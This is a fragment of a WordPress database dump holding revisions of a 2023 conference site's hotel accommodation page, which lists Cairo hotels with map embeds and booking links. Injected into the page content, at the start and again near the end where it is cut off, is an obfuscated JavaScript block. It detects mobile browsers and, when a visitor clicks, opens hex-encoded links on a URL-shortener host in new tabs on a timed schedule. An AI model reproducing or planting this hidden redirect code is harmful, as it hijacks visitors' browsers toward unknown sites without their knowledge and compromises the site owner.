_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-07-18 23:21:20','2023-07-18 23:21:20','',2685,'https://gsw2023.com/?p=5031',0,'revision','',0),
(5032,1,'2023-07-18 23:21:40','2023-07-18 23:21:40','<p>[vc_row][vc_column][dt_banner image_id=\"2683\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">INTERCONTINENTAL CAIRO SEMIRAMIS</span></h2>\n<ul>\n<li style=\"text-align: left;\">\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\n</li>\n</ul>\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"></iframe></p>\n<h4><span style=\"color: #ffffff;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 14pt;\"><a style=\"color: #ffff00;\" href=\"https://www.ihg.com/intercontinental/hotels/us/en/cairo/croha/hoteldetail?fromRedirect=true&amp;qSrt=sAV&amp;qIta=99801505&amp;icdv=99801505&amp;qSlH=CROHA&amp;qGrpCd=DY8&amp;setPMCookies=true&amp;qSHBrC=IC&amp;qDest=Corniche+El+Nil%252C+Cairo%252C+EG&amp;srb_u=1\" target=\"_blank\" rel=\"noopener\">BOOK NOW</a></span></h5>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][dt_banner image_id=\"2688\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Steigenberger Hotel El Tahrir</span></h2>\n<p><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></strong></span></p>\n<p style=\"text-align: left;\"><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe></p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">BOOK NOW  </a></strong></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">Steigenberger Hotel El Tahrir – GSW2023</a></strong></span></h4>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"4788\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 class=\"vc_custom_heading\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">Grand Nile Tower Hotel</span></h2>\n<ul>\n<li><span style=\"color: #ffffff;\"><a style=\"color: #ffffff;\" href=\"https://www.grandniletower.com/\">https://www.grandniletower.com/</a></span></li>\n</ul>\n<p><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3454.091887744032!2d31.22467591511475!3d30.03422158188607!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x14584090695d6421%3A0x201285387107863a!2sGrand%20Nile%20Tower!5e0!3m2!1sen!2ssa!4v1689721277379!5m2!1sen!2ssa\" width=\"200\" height=\"200\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p>\n<h5 style=\"text-align: center;\"><a href=\"https://gsw2023.com/index.php/grand-nile-tower-hotel/\"><span style=\"font-size: 14pt; color: #ffff00;\">BOOK NOW</span></a></h5>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"4730\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 class=\"vc_custom_heading\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">Novotel Cairo El Borg</span></h2>\n<ul>\n<li><span style=\"color: #ffffff; font-size: 12pt;\"><strong><a style=\"color: #ffffff;\" href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></strong></span></li>\n</ul>\n<p><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe></p>\n<ul>\n<li>\n<h4><span style=\"color: #ffffff;\">Special Rate Booking is Opened Now</span></h4>\n<h5><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 15, 2023</span></h5>\n</li>\n</ul>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/novotel-cairo-el-borg/\"><span style=\"color: #ffff00;\">BOOK NOW </span> </a></strong></span></h4>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"2689\" bg_color=\"rgba(255,255,255,0.01)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Kempinski Nile Hotel Garden City Cairo</span></h2>\n<ul>\n<li><strong><span style=\"font-size: 12pt; color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></span></strong></li>\n</ul>\n<p><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe></p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return 